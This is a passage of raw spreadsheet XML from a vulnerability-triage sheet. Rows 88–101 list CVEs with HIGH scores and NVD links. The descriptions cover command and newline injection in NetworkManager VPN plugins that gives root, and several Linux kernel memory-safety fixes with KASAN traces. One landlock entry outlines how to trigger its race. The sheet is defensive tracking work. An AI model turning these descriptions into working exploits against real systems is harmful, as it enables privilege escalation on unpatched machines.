        <v>7.8</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-sstp, the SSTP VPN plugin for NetworkManager. A local unprivileged user can exploit this vulnerability by embedding special characters, known as shell metacharacters, into VPN connection profile fields such as CA certificate or proxy settings. These unescaped characters are then processed by the `pppd` daemon, which runs with root privileges, allowing the attacker to execute arbitrary commands with elevated permissions when a malicious VPN connection is activated.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91838</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91839</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-fortisslvpn, the FortiSSLVPN plugin for NetworkManager. The nm-fortisslvpn-service improperly handles carriage-return/line-feed (CR/LF) characters in VPN connection profile credentials. A local unprivileged user can exploit this by crafting a malicious VPN profile to inject additional configuration directives. This can lead to arbitrary code execution with root privileges when the crafted VPN connection is activated.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91839</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91840</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-vpnc. This vulnerability allows a local unprivileged user to escalate privileges to root. By injecting a newline character into the VPN username field, an attacker can manipulate the vpnc configuration to execute an arbitrary program with root privileges when the malicious VPN connection is activated.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91840</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91841</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-vpnc, a VPN plugin for NetworkManager. A local unprivileged user can exploit this vulnerability by injecting a newline character into the CA-File path. This manipulation allows the user to execute arbitrary commands as the root user, leading to local privilege escalation.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91841</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97548</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr"/>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: fix the rtrmap and rtrefcount _maxlevels_ondisk functions
The _maxlevels_ondisk functions are used to compute the size of
in-memory btree cursors for each btree type.  Unfortunately, LOLLM
noticed that the rtrmap and rtrefcount versions of these functions
forget to account for the inode root, which means that we could access
beyond the end of the cursor given a sufficiently large btree.  Fix
this.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97548</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97575</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr"/>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: v4l2-ctrls: validate AV1 tile counts
The stateless AV1 decoders use tile_info.tile_cols and tile_rows as loop
bounds and as indices into the mi_*_starts[] and *_in_sbs_minus_1[]
arrays, as the divisor for context_update_tile_id, and their product
bounds the per-tile descriptor buffers, but std_validate_compound() does
not bound these u8 fields. Reject a V4L2_CTRL_TYPE_AV1_FRAME whose
tile_cols or tile_rows exceeds V4L2_AV1_MAX_TILE_COLS / _ROWS, or whose
product exceeds V4L2_AV1_MAX_TILE_COUNT. A zero tile count is left to the
consuming driver so the zero-initialised control that existing userspace
submits is still accepted.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97575</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97576</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr"/>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: v4l2-ctrls: validate HEVC tile counts
The stateless HEVC decoders read num_tile_columns_minus1 + 1 entries from
column_width_minus1[] and num_tile_rows_minus1 + 1 from row_height_minus1[]
and use them as tile-loop bounds, but std_validate_compound() does not
bound these u8 counts. Reject a V4L2_CTRL_TYPE_HEVC_PPS with tiling
enabled whose tile counts exceed the uAPI array capacity, mirroring the
existing compound-control range checks.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97576</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97577</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr"/>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: verisilicon: rockchip: reject AV1 frames exceeding the tile capacity
rockchip_vpu981_av1_dec_set_tile_info() indexes the tile group entry
array by tile1 * tile_cols + tile0, reading up to tile_cols * tile_rows
entries, lays out one descriptor per tile in the AV1_MAX_TILES tile_info
buffer, and programs the real tile_cols / tile_rows into the hardware.
The tile group entry control is a dynamic array sized to the number of
entries userspace submitted, independent of tile_cols / tile_rows, so a
frame that claims more tiles than entries reads past the array. A frame
that claims more than AV1_MAX_TILES tiles also leaves the hardware
programmed for more tiles than the descriptor buffer holds.
Reject both in prepare_run(): tile_cols * tile_rows must not exceed the
submitted entry count or AV1_MAX_TILES. The entry count is read via
v4l2_ctrl_find() (ctrl-&gt;elems). This mirrors the bound the mediatek AV1
decoder already enforces.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97577</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97578</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr"/>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: verisilicon: rockchip: guard VPU981 AV1 divisor and tile buffer
rockchip_vpu981_av1_dec_set_tile_info() divides context_update_tile_id by
tile_info-&gt;tile_cols and writes one descriptor per tile into the tile_info
DMA buffer, which holds AV1_MAX_TILES entries; tile_cols and tile_rows
come from the bitstream. Guard the division against a zero tile_cols by
initialising the context-update values to zero and computing them only
when tile_cols is non-zero, and stop the descriptor writes once the
tile_info buffer is full. The tile geometry written to the hardware
registers is left unmodified; the per-dimension and total tile bounds are
enforced by the control validation.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97578</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97579</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr"/>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: mediatek: vcodec: bound AV1 tile-start copy to the array capacity
vdec_av1_slice_setup_tile() copies tile_cols + 1 / tile_rows + 1 entries
into mi_col_starts[] / mi_row_starts[] from the bitstream tile_info. Bound
the copy to the array capacity.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97579</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97580</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr"/>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: rkvdec: bound HEVC tile loops and PPS id to the array capacity
compute_tiles_uniform() and compute_tiles_non_uniform() loop over
num_tile_columns_minus1 + 1 / num_tile_rows_minus1 + 1 entries, and
assemble_hw_pps() writes one COLUMN_WIDTH / ROW_HEIGHT register per tile
and indexes priv_tbl-&gt;param_set[] by pic_parameter_set_id, all taken from
the untrusted PPS. Use the bounded v4l2_hevc_pps_num_tile_columns() /
v4l2_hevc_pps_num_tile_rows() helpers for the tile loops, and bail out of
assemble_hw_pps() before indexing priv_tbl-&gt;param_set[] with an
out-of-range pic_parameter_set_id, so the writes stay within the hardware
tables.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97580</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97584</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr"/>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
afs: Fix incorrect free in candidate cleanup in afs_lookup_server()
Fix afs_lookup_server() to not free an existing server's endpoint state
when cleaning up a candidate server.  The candidate record doesn't have an
endpoint state yet at this point, so the free for that can just be removed.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97584</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97594</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr"/>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
landlock: Fix use-after-free of the source's parent directory
current_check_refer_path() reads old_dentry-&gt;d_parent without holding a
reference nor a lock on it, and then dereferences it in
collect_domain_accesses() and in the audit record.
A reference on a child does not pin its parent: __d_move() reassigns
dentry-&gt;d_parent and drops the reference the child held on its former
parent.  hook_path_rename() is not affected because the rename path
calls lock_rename() before the hook, so the source cannot be reparented
under it.  hook_path_link() has no such protection: filename_linkat()
holds a reference on the source dentry but neither locks nor references
its parent, so a concurrent rename(2) can reparent the source while
security_path_link() runs, and the former parent can then be removed and
freed while the hook walks it.
A process can trigger this after entering a Landlock domain that handles
at least one filesystem access right.  The process can then race a
linkat(2) loop against rename(2) and rmdir(2):
  BUG: KASAN: slab-use-after-free in collect_domain_accesses+0x278/0x290
  Read of size 4 at addr ffff888160bd53f4 by task llrepro2/549
   collect_domain_accesses+0x278/0x290
   current_check_refer_path+0x952/0x1120
   security_path_link+0x1be/0x320
   filename_linkat+0x342/0x6d0
   __x64_sys_linkat+0xfa/0x150
  Freed by task 562:
   kmem_cache_free+0x139/0x4c0
   i_callback+0x4b/0x80
   rcu_core+0x7dc/0x10a0
Take a reference on the dentry selected as the source parent, using
dget() for the common-mount-root case and dget_parent() otherwise.
Release it after the hierarchy walk and synchronous audit logging.
[mic: Clarify the caller, reachability, and reference handling]</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97594</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97602</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr"/>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
inet: frags: invalidate queues before flushing them
fqdir_pre_exit() flushes the skbs from incomplete queues without
changing their completion state. A fragment which found a queue before
high_thresh was cleared can then acquire the queue lock and reuse stale
reassembly metadata. A queue concurrently killed after fqdir-&gt;dead is
set can instead become INET_FRAG_COMPLETE|INET_FRAG_HASH_DEAD while
still holding its old skbs; skipping it because it is complete leaves
those references behind until asynchronous fqdir teardown.
For IPv6, stale metadata can make ip6_frag_reasm() use the old
nhoffset with a new skb and access memory out of bounds. The resulting
heap corruption can be leveraged for local privilege escalation when
unprivileged network namespaces are available. Unflushed fragments can
also keep conntrack references alive after the conntrack per-net
cleanup point.
Kill each incomplete queue, then flush every queue still owned by the
dying rhashtable. HASH_DEAD identifies that ownership, while complete
queues without it are already owned by another destroy path and must be
left alone. Releasing a timer reference removed by inet_frag_kill() is
deferred to inet_frag_putn(), after the queue lock is dropped.
KASAN report:
  BUG: KASAN: slab-out-of-bounds in ipv6_frag_rcv (net/ipv6/reassembly.c:289 (discriminator 2) net/ipv6/reassembly.c:229 (discriminator 2) net/ipv6/reassembly.c:391 (discriminator 2))
  Write of size 1 at addr ff110001039c6e00 by task poc/771
  Call Trace:
  ? ipv6_frag_rcv (net/ipv6/reassembly.c:289 (discriminator 2) net/ipv6/reassembly.c:229 (discriminator 2) net/ipv6/reassembly.c:391 (discriminator 2))
  ipv6_frag_rcv (net/ipv6/reassembly.c:289 (discriminator 2) net/ipv6/reassembly.c:229 (discriminator 2) net/ipv6/reassembly.c:391 (discriminator 2))
  ip6_protocol_deliver_rcu (net/ipv6/ip6_input.c:479 (discriminator 5))
  ip6_input_finish (net/ipv6/ip6_input.c:534)
